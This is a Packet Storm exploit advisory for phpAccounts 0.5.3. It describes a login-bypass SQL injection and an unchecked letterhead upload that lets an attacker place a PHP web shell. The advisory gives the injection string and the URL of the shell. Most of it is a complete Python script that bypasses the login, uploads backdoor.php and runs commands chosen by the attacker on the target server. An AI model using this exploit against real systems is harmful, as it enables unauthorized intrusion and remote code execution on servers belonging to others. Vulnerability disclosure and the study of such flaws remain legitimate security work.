phpAccounts 0.5.3 SQL Injection

2012-06-09T00:00:00
ID PACKETSTORM:113454
Type packetstorm
Reporter loneferret
Modified 2012-06-09T00:00:00

Description

                                        
                                            `######################################################################################  
# Exploit phpAcounts v.0.5.3 SQL Injection  
# Date: June 6nd 2012  
# Author: loneferret  
# Version: 0.5.3  
# Vendor Url: http://phpaccounts.com/  
# Tested on: Ubuntu Server 11.10  
######################################################################################  
# Discovered by: loneferret  
######################################################################################  
  
# Old app, still fun.  
  
Auth. Bypass:  
http://<server>/phpaccounts/index.php  
Username: x' or '1'='1'#  
Password: <whatever>  
  
Upload php shell in preferences  
Letterhead image upload does not sanitize file extensions.  
http://server/index.php?page=tasks&action=preferences  
  
Acess shell:  
Where '1' is the user's ID.  
http://server/phpaccounts/users/1/<filename>  
  
  
  
---- Python PoC ---------  
  
#!/usr/bin/python  
  
import re, mechanize  
import urllib, sys  
  
print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"  
print "[*] Vulnerability discovered by loneferret"  
  
print "[*] Offensive Security - http://www.offensive-security.com\n"  
if (len(sys.argv) != 3):  
print "[*] Usage: poc.py <RHOST> <RCMD>"  
exit(0)  
  
rhost = sys.argv[1]  
rcmd = sys.argv[2]  
  
  
print "[*] Bypassing Login ."  
try:  
br = mechanize.Browser()  
br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)  
assert br.viewing_html()  
br.select_form(name="loginForm")  
br.select_form(nr=0)  
br.form['Login_Username'] = "x' or '1'#"  
br.form['Login_Password'] = "pwnd"  
print "[*] Triggering SQLi .."  
br.submit()  
except:  
print "[*] Oups..Something happened"  
exit(0)  
  
print "[*] Uploading Shell ..."  
try:  
br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)  
assert br.viewing_html()  
br.select_form(nr=0)  
br.form["Preferences[LETTER_HEADER]"] = 'test'  
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")  
br.submit(nr=2)  
except:  
print "[*] Upload didn't work"  
exit(0)  
  
print "[*] Command Executed\n"  
try:  
shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))  
print shell.read()  
except:  
print "[*] Oups."  
exit(0)  
  
`